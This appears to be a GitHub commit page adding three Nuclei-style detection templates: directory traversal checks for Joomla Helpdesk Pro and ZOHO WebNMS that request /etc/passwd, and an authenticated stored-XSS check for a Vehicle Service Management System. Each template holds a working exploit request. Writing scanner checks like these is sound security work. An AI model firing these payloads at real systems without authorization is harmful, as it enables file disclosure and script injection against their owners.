-
Notifications
You must be signed in to change notification settings - Fork 643
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
84 changed files
with
1,540 additions
and
396 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: CVE-2015-4074 | ||
info: | ||
name: Joomla Helpdesk Pro plugin before 1.4.0 - Local File Disclosure | ||
author: 0x_Akoko | ||
severity: high | ||
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task. | ||
reference: | ||
- https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html | ||
- https://www.exploit-db.com/exploits/37666/ | ||
- https://www.cvedetails.com/cve/CVE-2015-4074 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2015-4074 | ||
cwe-id: CWE-22 | ||
tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2016-6601 | ||
|
||
info: | ||
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal | ||
author: 0x_Akoko | ||
severity: high | ||
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile | ||
reference: | ||
- https://www.cvedetails.com/cve/CVE-2016-6601 | ||
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt | ||
- https://www.exploit-db.com/exploits/40229/ | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2016-6601 | ||
cwe-id: CWE-22 | ||
tags: cve,cve2016,zoho,lfi,webnms | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:.*:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
id: CVE-2021-46073 | ||
|
||
info: | ||
name: Vehicle Service Management System - Cross Site Scripting | ||
author: TenBird | ||
severity: medium | ||
description: | | ||
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel. | ||
reference: | ||
- https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS | ||
- https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss | ||
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46073 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 4.8 | ||
cve-id: CVE-2021-46073 | ||
cwe-id: CWE-79 | ||
metadata: | ||
verified: "true" | ||
tags: cve,cve2021,xss,vms,authenticated | ||
requests: | ||
- raw: | ||
- | | ||
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | ||
username={{username}}&password={{password}} | ||
- | | ||
POST /vehicle_service/classes/Users.php?f=save HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1 | ||
- | | ||
GET /vehicle_service/admin/?page=user/list HTTP/1.1 | ||
Host: {{Hostname}} | ||
req-condition: true | ||
redirects: true | ||
max-redirects: 2 | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "contains(all_headers_3, 'text/html')" | ||
- "status_code_3 == 200" | ||
- 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")' | ||
condition: and |
Oops, something went wrong.